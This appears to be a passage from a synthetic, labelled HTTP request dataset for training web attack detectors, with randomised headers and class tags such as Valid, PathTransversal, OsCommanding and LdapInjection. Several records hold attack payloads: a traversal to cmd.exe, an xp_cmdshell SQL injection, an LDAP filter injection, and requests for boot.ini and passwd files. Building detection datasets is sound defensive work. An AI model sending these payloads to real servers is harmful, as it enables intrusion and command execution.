If-Unmodified-Since: Sun, 04 Oct 09 19:05:26 GMT
If-Match: "v1yudLbNIx@nYsD"
If-None-Match: "qf_dh8LunId_x0C"
If-Range: "I..N93QD2hKVG.rQ20"
Max-Forwards: 445
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM bjh2am1haGx1ZWF2bm55bkNlaGlyaFRhYWZzaDNzU3VldTZIb054QWE=
Range: -1
Referer: http://www.iabLftD.com/hmis2ben/7rpGrlwx/bougt/voiEr/tFSfnel.php4
TE: deflate;q=0.6,deflate
Trailer: If-Range
User-Agent: zthdHsXt5o (iNa6I53O9; anDjpR1; hzwRgx6H; o-_ApAdBY)
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9846x663
Via: 6.0 www.i4iGw.shtml, 5.8 88.204.159.152:617, g8veet/7.3 79.180.223.67
Transfer-Encoding: identity
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 242.97.236.194
X-Serial-Number: 493178
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16412
Start - Id: 12746
class: Valid
GET /omTFCTRn0E2rBBTYoC4B/aeUgr8DhJj3srh/ie6ehnhYn/8JHbDzMm/wsse4tli/rmtm-3MIu/of-s56iOq9zdDoLy.asmx?oe2erLa=d-%3Fbisst2Ebstmpjr&aerI=pYetNmdfaf&rwfl=6716&jresdrtittel=950424 HTTP/1.0
Host: 52.205.212.121
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-icelandic, iso-10646-ucs-2;q=0.7, koi8-r;q=0.5, iso-8859-4
Accept-Encoding: deflate, deflate;q=0.2, identity, compress;q=0.4
Accept-Language: idstlosw-p, ysotqwg-nuo;q=0.3
Cache-Control: only-if-cached
Client-ip: 106.56.170.223
Cookie: @t13u7Uk6=a9reh;lszr=eK2@HO5zZ0
Cookie2: $Version="599"
Date: Sat, 14 Jul 07 08:32:27 UTC
ETag: W/"20@7Eq2DSjk_tq7ZHdB"
Expect: 100-continue
From: ensecrsd@aioee828zo.fr
If-Modified-Since: Fri, 02 Dec 05 20:24:58 CET
If-Unmodified-Since: Tue, 21 Nov 06 14:33:22 GMT
If-Match: "1B5pxeoaBhSAc.nJm2vR"
If-None-Match: "Dju7IgCbH-bJwiBLv_i7"
If-Range: Mon, 24 Nov 08 07:39:19 CET
Max-Forwards: 32
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: Digest nc=A23467be
Range: 23407-76
Referer: /euhdAih/zylthd/sini/llheaC/oiolevt.bin
TE: chunked;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.4 (X11; U; Linux i386 7.5; et-rp; rv:8.2.8) Gecko/33207756
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: deflate
Upgrade: eooi/2.7, van/3.8, dpde/7.1, deu1tv/8.1
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 70965960984740249888
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12746
Start - Id: 45580
class: PathTransversal
GET /tDhr7N6Y61rND/hsUJ85DnILYZj/hIaPJmqxXD/th1ron9ejated/pOYXlTf/forminTIF0G/eqec.CJxU-ffUp3/sAYqtOIs2r@KXNVy.z/rm9shutdownBbnFegsdivywhere/yESJbeAFE0svu@.jsp?kgPSmochaandWQH=4&gQvAacceptucfL6=rrty&tya=hiAn&8eeojtb=15333&th=rEsnip&0a5DOQKsMKo=rJ8M%40-t8nq-&heicaMteeEEmiil=w%3A%5Cwinnt%5Cboot.ini&rpiitbuhate=101&lbo=afk1s&NYyGIS4_=mjrrEs4aehbeE&c0sgalagoei=mlike%3Dinclude&tete=9rfrom&Rywgeo=5282820 HTTP/1.0
Host: www.ittaummt.fr
Connection: edri
Accept: */*;q=0.0
Accept-Charset: utf-8;q=0.8, iso-8859-4, euc-cn, x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: asEfrh-dlrrdxlr;q=0.0, r-tb;q=0.3, yn-ntieiNs;q=0.8, etaAr-0lijru5;q=0.2
Cache-Control: no-cache
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="2"
Date: Fri, 22 May 09 03:55:55 CET
ETag: "W@5PqyMvVxHHDy-"
Expect: 100-continue
From: wtdlbok@elsFbheed.st
If-Modified-Since: Mon, 19 Nov 07 18:32:13 GMT
If-Unmodified-Since: Thu, 29 Nov 07 16:26:04 UTC
If-Match: "WePpOAJRMlqnhUwGs3t"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: 286-378831
Referer: http://www.fdnlnoe9.com/oc8ua.shtml
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 2.4; ar-st; rv:1.8.8) Gecko/77553030
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45580
Start - Id: 21598
class: Valid
GET /Os/eeontr7exa/iwSrlo4t/dWcJc5/ed5agEelmasttto5am/t2evfagndartaenea0oR.jpeg?QDiG7=78&ointcSatmonkers=+es0&rooreio5omdott=pChN&lNtiu6aHhnlRtda=zvdJi&de6qhlsRErsEbt=k+i%26+i%7Ceohtnnng%3Emo&ReaRfhla=oibtn7m&0q_b=mt6&0qraco=tnotd&rnNahi8=aP2AeRX&liriasvolO=ismemo&eetqosgete94e=frxseeuxTeos&LinB_8-4o-=urte1 HTTP/1.1
Host: 177.141.23.223
Connection: keep-alive
Accept: text/html;q=0.1
Accept-Charset: x-mac-icelandic;q=0.6, windows-1258
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=33080
Client-ip: 17.76.234.190
Cookie: ai=hkn ;rwh=vdhborl6plar4er;cgpiLEi4Iceoue=Nlh8pra rF;aqfk9o=nEnlWaenE;Aefpxi=674681886;wu1o=Ie
Cookie2: $Version="1"
Date: Mon, 12 Oct 09 04:24:22 UTC
ETag: "HbDOE4mELUlA4X1_S"
Expect: EfeOt
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Wed, 22 Dec 04 22:56:48 CET
If-Unmodified-Since: Thu, 03 Jan 08 14:13:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Aug 05 05:20:02 GMT
Max-Forwards: 30
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: ttRie mdrt=6Kielkrt
Authorization: Digest uri=http://www.Frrtshp.gov/xLEdAor/jxex7h8.txt
Range: 74322-,-826
Referer: /ze0ttrxn/rwwaseeh.doc
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 2.2; 4g-hh; rv:3.6.1) Gecko/79967716
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 592x4496
Via: 1.7 www.ctkeesRa.gif, FTP/6.6 16.231.177.7, FTP/8.1 www.azdiaD1h.gif:21
Transfer-Encoding: identity
Upgrade: aead5/2.4
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21598
Start - Id: 20140
class: Valid
GET /oceg4arirwea/aj6YXQw7/inatgqAi5sb7/mEjmtL/spl3iwpir/dcLqZMM/Hl0/milAy/sE6@cjZjso/alsees7o0aqRe/eR91H4tH.JZ2HwJBo.cgi? HTTP/1.0
Host: www.oee1d0ippo.it:002
Connection: mnabn
Accept: application/zip, image/gif;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity;q=0.4, gzip;q=0.0, gzip;q=0.7
Accept-Language: jhbge6nE-otcn, 5e-stcf, ee-eDwmpY;q=0.5, C-ino
Cache-Control: max-age=62
Client-ip: 112.70.151.93
Cookie: aeooemlaoti=s
Cookie2: $Version="2"
Date: Sun, 02 Apr 06 24:13:02 GMT
ETag: "UEDIWMBQIfD4d18"
Expect: 100-continue
From: np1ebr9@yntet.it
If-Modified-Since: Sun, 15 Nov 09 02:27:31 UTC
If-Unmodified-Since: Sun, 04 Nov 07 08:18:46 UTC
If-Match: "_egm_GhJu_xLewo@FA"
If-None-Match: "TY0yLK1UxEUvRWY"
If-Range: "bMV7x.7haX27oL3"
Max-Forwards: 5674
MIME-Version: 1.8
Pragma: had=cd
Proxy-Authorization: Digest algorithm=MD5
Authorization: olet phmv=hec1orSa
Range: 48910-875971,804755-62
Referer: /nhamneg.php
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/4.7 (Windows; U; WinNT 2.9; lo-m0; rv:3.6.7) Gecko/04715020
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: 7.0 www.enud.js, HTTP/7.4 163.137.218.11
Transfer-Encoding: compress
Upgrade: gsxSw/8.7, hxstE4/2.5, thn/2.2, tad/9.4, rii/8.9
Warning: 998 www.ttRcoh91.jpeg "bE5Jru" 
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20140
Start - Id: 43853
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 6.92.126.185
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.7, compress
Accept-Language: rew8-m8t, irmdH-dtTtvi, eb-d, tc-TeeiTrzp
Cache-Control: only-if-cached
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Wed, 19 Oct 05 03:36:39 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 May 05 22:17:20 GMT
If-Unmodified-Since: Mon, 26 Jan 09 01:21:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: bihxnush=Ohhelo
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: tf1et Eejuotis=rwaduier
Range: 064373-124259,214-265,801-679
Referer: /nyeakcnf/sttughLe/lwt0lrf/oiNeM/iowipe.zip
TE: deflate;q=0.8,deflate
Trailer: User-Agent
User-Agent: eh7Sclntd/1.4.9.0
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: identity
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 945 www.gtdUia.htm:89243 "orsieue5ctiw" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43853
Start - Id: 11893
class: Valid
GET /So/1yrwanSdaetkszaaao/zD6HwiR4W4UvvsWV/jNo/u_FNd/3StTpVVx/hiheu7Oye0t/4tctF/eA/bkk0SdlHYX5Yx.gif? HTTP/1.0
Host: www.oidt3.st:80
Connection: t9de
Accept: video/mpeg, application/x-tar;q=0.5
Accept-Charset: koi8-r;q=0.4, windows-1257;q=0.7, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=3912
Client-ip: 8.113.175.85
Cookie: sorztaeaa=uaeswiynwqnelptba
Cookie2: $Version="53"
Date: Wed, 07 Jan 09 18:34:35 CET
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: 100-continue
From: weec@otvo.uk
If-Modified-Since: Wed, 11 Oct 06 06:53:23 UTC
If-Unmodified-Since: Thu, 31 Jul 08 04:41:06 GMT
If-Match: "Vt4HIbZT2qv.H-TK"
If-None-Match: "Gi2K7MQmVcMP66YBo_m"
If-Range: "cGb5T7wbkQT6fLN"
Max-Forwards: 2
MIME-Version: 7.7
Pragma: qb4t=edldyr
Proxy-Authorization: Digest realm
Authorization: Digest username="lSa3"
Range: 477-56
Referer: /rsceraat/romur.html
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 9.9; tl-eo; rv:5.8.6) Gecko/27259989
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 151x6583
Via: 6.0 www.isN9kuh.tiff, 3.9 www.eqdpUpr.png
Transfer-Encoding: icdAe
Upgrade: Ijh/8.0
Warning: 032 www.ca9a6wh.png "rnn53ecqdgOmY0eteI" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11893
Start - Id: 8596
class: Valid
GET /icDTY-p/oiKz9ncP/Undaihhod/aLE/gteei/mwpT5CJqZh8UuZNp487/uw/lf01eyYxakOcI/oQmHY.o5RF/8g1sarsam6liruidot/g_T.gif?szkysenphlh=0107205&JpCnin_KW=oS.sl&g1aiatcReNgtvnS=w1c0i&imesiSeYEtezn=Ho6epslsa6hsoeeri&swFaesost=104 HTTP/1.0
Host: www.ottbhkciao.org
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.5, iso-8859-8, iso-8859-15;q=0.6, iso-8859-5
Accept-Encoding: deflate;q=0.2
Accept-Language: a-trunh;q=0.0, p-oailaccn, 8e-p, 1rcegt-ec8;q=0.5
Cache-Control: only-if-cached
Client-ip: 168.87.198.125
Cookie: anwawemItj=xgswFdzvUd_;tERr=m;ortiSHuyd=Rwx 'td
Cookie2: $Version="36"
Date: Tue, 07 Nov 06 05:47:27 CET
ETag: "DGgt8SPDzWPxBrfgbo"
Expect: 100-continue
From: asd1nsk@lxciS.de
If-Modified-Since: Mon, 21 Sep 09 20:53:10 UTC
If-Unmodified-Since: Sat, 15 Nov 08 20:24:04 UTC
If-Match: "NcO5Am2pTLkWWphJ"
If-None-Match: *
If-Range: Fri, 10 Mar 06 09:25:43 GMT
Max-Forwards: 55
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM dGFzaWxseHl4NW5lZ25kZHdmYkxncm5odGw5ZmhjbnNvUA==
Authorization: Basic bWRFeG5hOm5hZ2FlZW9k
Range: 90141-597
Referer: http://boRr.net/ycongo/swse.nsf
TE: deflate,deflate;q=0.5,gzip;q=0.8
Trailer: If-Match
User-Agent: Mdsr (ednR_Y; i0NVi-i; aQ9l59A; 1XD2tI.NL; 1gLVbzj)
UA-CPU: 68000
UA-Disp: 692,9024,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 706x840
Via: FTP/6.1 179.103.196.39, 5.1 22.9.198.84:0399
Transfer-Encoding: i4prp
Upgrade: tnlctt/8.2
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 70.113.134.5
X-Serial-Number: 1101244
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8596
Start - Id: 15056
class: Valid
GET /wb1/RhavingIbxmlCf/rE9szeouzbp7rnapa/3rvsehezbhicatumeDr/lMcFl5uzhPh.css? HTTP/1.0
Host: 31.151.218.139
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.7, iso-8859-1
Accept-Encoding: *;q=0.2
Accept-Language: urt-Blw, eur2ls-or, t-nesPo;q=0.5, onrPsaUr-r, n-eatmwthv
Cache-Control: no-transform
Client-ip: 222.250.250.163
Cookie: Er4se=3lrrO hsaahc
Cookie2: $Version="71"
Date: Wed, 07 Oct 09 16:10:53 UTC
ETag: "@_esZrV1r5HoOv6_8"
Expect: 100-continue
From: NBko@ilcocf4eu.ch
If-Modified-Since: Thu, 07 Dec 06 12:33:16 CET
If-Unmodified-Since: Mon, 19 Oct 09 18:38:57 GMT
If-Match: *
If-None-Match: "TvuqH1XMYwahoij"
If-Range: "ec4AruIOH3DKNEH4GF."
Max-Forwards: 303
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic ZXRsZXRub3I6dHRibmc=
Range: 4-,-3,94-
Referer: http://www.5jesd.st/gisd/4r2yufA.wmn
TE: trailers,gzip
Trailer: Via
User-Agent: Mozilla/6.2 (X11; U; Open BSD i586 9.7; a3-do; rv:5.5.9) Gecko/35373493
UA-CPU: MIPS
UA-Disp: 1398,2099,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 656x086
Via: HTTP/2.3 145.69.147.214, okus/4.2 www.Tadatjsm.jpg
Transfer-Encoding: tiytt
Upgrade: raA/4.1, led/0.8, Sna/5.8, aie/5.1, ipm/0.5
Warning: 670 120.59.241.81 "srredysdrtssiTT" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15056
Start - Id: 5975
class: Valid
POST /fUe/I4aeeVahv/eRphNMKhSff-bbfW7OsT/yGU-6/5e/8Bt/jTyan4e5tstr/5mytnsntnte.swf? HTTP/1.0
Content-Length: 18
Content-Language: petey7a,hcms
Content-Encoding: gzip
Content-Location: http://www.aafy.cz/thcoc/e9ttgTu/tanlueT/wastEl/tnteneg.jsp
Content-MD5: bmNtazdoaTJINGVsbkhtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 12:34:16 UTC
Last-Modified: Fri, 12 Mar 10 15:19:39 GMT
Host: 184.122.227.180:556
Connection: keep-alive
Accept: image/jpeg, image/gif;q=0.9, video/*
Accept-Charset: iso-8859-9;q=0.2, x-mac-greek
Accept-Encoding: *;q=0.6
Accept-Language: eehng2w-ebe;q=0.3, rr-RfounbQ;q=0.0
Cache-Control: min-fresh=98
Client-ip: 26.138.248.122
Cookie: vyNLUbetchTo-=t;CQtlDtesine=up2S1;yianlie=968;tsdlgpeeoa=41055068;etaota2elt0=Tpcftpopen7nu
Cookie2: $Version="0"
Date: Sun, 06 Nov 05 12:19:27 CET
ETag: W/"cU7PSuHBpRlrODCr"
Expect: 100-continue
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Mon, 21 Aug 06 08:41:44 UTC
If-Unmodified-Since: Tue, 20 Sep 05 05:36:05 CET
If-Match: *
If-None-Match: "E@ukxZMz2LXZv3kU"
If-Range: Thu, 21 Jun 07 13:47:15 CET
Max-Forwards: 011
MIME-Version: 7.2
Pragma: 4i=n3f
Proxy-Authorization: NTLM bkNuaXNvbGExYW1hdGlodHRzZUh3NG5jYmtvNWloT3RuYW0ydnNv
Authorization: Basic Tmxzcm55OmVtaHJ0
Range: 7772-71595
Referer: http://www.6nxtel.fr/auRia.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.3 (compatible; rahxra5eO; Win98; iiehtleadU; qotashnc; Szm6graiiA)
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 008x6801
Via: 5.7 www.hjTpb7gs.css, HTTP/9.6 www.xoeg5agt.html
Transfer-Encoding: compress
Upgrade: treana/1.3, oher5/3.1
Warning: 116 www.AsB4fE.css "ceGyewiRcegeii" "Mon, 10 Aug 09 03:15:41 CET"
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 490268
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

pIeatteiau=EvnAeiT

End - Id: 5975
Start - Id: 36419
class: OsCommanding
GET /q8iktenwtn7oTnmlRunl/lsPpuexecTn78CDncGfromO/cnK51kgq3fAu/aymeoyiaiautE/nN_EVb1F1a/gdcmhtoT7unyne.shtml?niastge=4&mgr=8&aptdrehnryau7a=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&rre=O0ss5reStr5lf HTTP/1.1
Host: www.cHetams.com
Connection: close
Accept: video/mpeg;q=0.5, image/*;q=0.1
Accept-Charset: us-ascii, x-mac-ce, windows-1253;q=0.1
Accept-Encoding: compress;q=0.8, identity, compress;q=0.7, compress;q=0.3
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Cookie: cYzxhavingrXK5yJT=eL
Cookie2: $Version="13"
Date: Sat, 09 May 09 11:00:21 GMT
Expect: 100-continue
If-Modified-Since: Sat, 08 Mar 08 24:21:51 GMT
If-Unmodified-Since: Mon, 08 Sep 08 02:41:17 UTC
If-Range: "gjwFm2apCzAIYeku"
Max-Forwards: 424
Pragma: tsed=2aiY7
Proxy-Authorization: NTLM dG1za2VudGxpeXR5ZWRSQWdodm9mcHpSdGVmWGlvbmpyZXRiZTM5bGt1
Authorization: Basic bkhzZGE6bmVtZ3NoZw==
Referer: http://www.oh2ieh.ch/uxii/NnAoorc.mdb
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 7.4; as-te; rv:1.8.7) Gecko/12945100
UA-Color: color16
Via: 1.9 212.65.243.243, HTTP/5.2 www.ehrodi.jpeg
Transfer-Encoding: compress
Warning: 123 www.r6hayneh.css:34967 "ekee0eeac6" "Fri, 19 Aug 05 20:22:44 CET"
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36419
Start - Id: 37978
class: LdapInjection
GET /Fboot.inifG1nph-/80ad0yetola/sTpjGNy36/eata/nfl/kggnurafunlilose/vDGgSVZIM_5UDO@8/trem6tDtd5eeir8a/emhtE9rieh1ctnRv6.jsp?KIt2e3WOM5vQ=Dsn&ldarp4=me%2B&Ieln3odmtelxk=tMbd.Ad1g&m0spyfreuadgtsA=c&Busr0o@=7&_DO8=tOT%3C4ffmsT&e7yinenta=sfyFNDwhGq&tQxlike=xml&ebsmix0lhry9e=%29+++%28++%7C++++%28displayName%3Dhad*%29+++%28name+++%3D+had*++%29%28+++mail%3Dhad*+++%29&laas=4703&rug=-re6teapasswd%2Far&Ite2hsew3i=5945750973&4irt0p9=0363 HTTP/1.0
Host: 3.223.96.122:8
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-2, iso-8859-15, x-mac-ce;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Tue, 26 Jun 07 08:14:16 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Mon, 29 Sep 08 09:10:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Jul 09 21:45:24 UTC
Max-Forwards: 35
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest qop=auth-int
Range: 4893-,-7197
Referer: /drlhw/sdit/oiR4/uehh9m2o.js
TE: chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 3.9; uH-t2; rv:4.2.1) Gecko/97605267
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/1.9 www.ltTe.css:8239, 4.8 www.e7hr.jpg, ck9o/7.0 125.0.154.24
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37978
Start - Id: 1936
class: Valid
GET /xfWfgFuerssawNk.js? HTTP/1.0
Host: www.6ntfr.gov
Connection: eo7eRs
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 157.236.53.20
Cookie: 1M1lioea=9;suH3u8nnmmanaii=trEocermeullm;dlCsaAr=3596358;qur=5248;ltrgnettsXaa=lepdI3jn9m9gahrah;N28p=tGGCur@Vd
Cookie2: $Version="49"
Date: Thu, 12 Feb 04 12:49:41 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: onbfaeti
From: sliheOFe@oSenphus.it
If-Modified-Since: Tue, 20 Dec 05 09:34:35 UTC
If-Unmodified-Since: Tue, 07 Jun 05 11:27:43 GMT
If-Match: "Nq5iEonE.46dlU.5"
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 5
MIME-Version: 1.0
Pragma: 3rn9el=rnahswI
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: suela 6evhU=rEewqr
Range: -8,9401-9800,-599
Referer: /MPhtdt.sh
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: aeU2Ey6s6
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4348x363
Via: deNh/4.3 96.38.200.29, 2.1 www.ovoet.tiff, FTP/3.8 86.139.154.102
Transfer-Encoding: oemrbm
Upgrade: diahbn/4.5
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1936
Start - Id: 6843
class: Valid
POST /eges6ONtceEz1ota4di0/inputb-3_Dqr0/tZh.QzA6KwdRFE/fromSKqjHE/tCx9YryWAkFMhYqO/nid5r/ehuip7cesbsn4gese/L3aae/t3.html? HTTP/1.0
Content-Length: 48
Content-Language: ezre
Content-Encoding: identity
Content-Location: /usaedd/4rasht/ivai1vS/aChe.htm
Content-MD5: cFdldGhDZ2JtdXJvVE9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Jul 09 08:23:13 GMT
Last-Modified: Wed, 18 Jul 07 05:45:09 UTC
Host: 236.21.124.227:80
Connection: close
Accept: */*
Accept-Charset: utf-8, windows-1250, windows-1251
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 26.175.54.181
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="628"
Date: Sat, 18 Oct 08 17:55:30 UTC
ETag: W/"qmkQusRfs2p4B8o5H"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Fri, 21 Sep 07 19:30:12 CET
If-Unmodified-Since: Mon, 07 Feb 05 08:03:25 GMT
If-Match: *
If-None-Match: "ub8xv8DC9aX15WZ.nU"
If-Range: Sun, 12 Dec 04 01:47:32 GMT
Max-Forwards: 334
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Basic T29EbXNpbDpjSWFl
Range: 708-,54-
Referer: /L6wahot/3xna.aspx
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.4 (X11; U; Open BSD i586 4.1; ux-he; rv:2.6.8) Gecko/97821289
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 302x0187
Via: 6.1 www.ets1i.gif:7600, tcr8m/3.2 www.enrr.htm, in2O/8.1 193.50.191.123
Transfer-Encoding: identity
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 99955754
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4st3bob=tcd&nu9asa=scT-&re9Fau-=0&gq7Cea0O7=czrw

End - Id: 6843
Start - Id: 8051
class: Valid
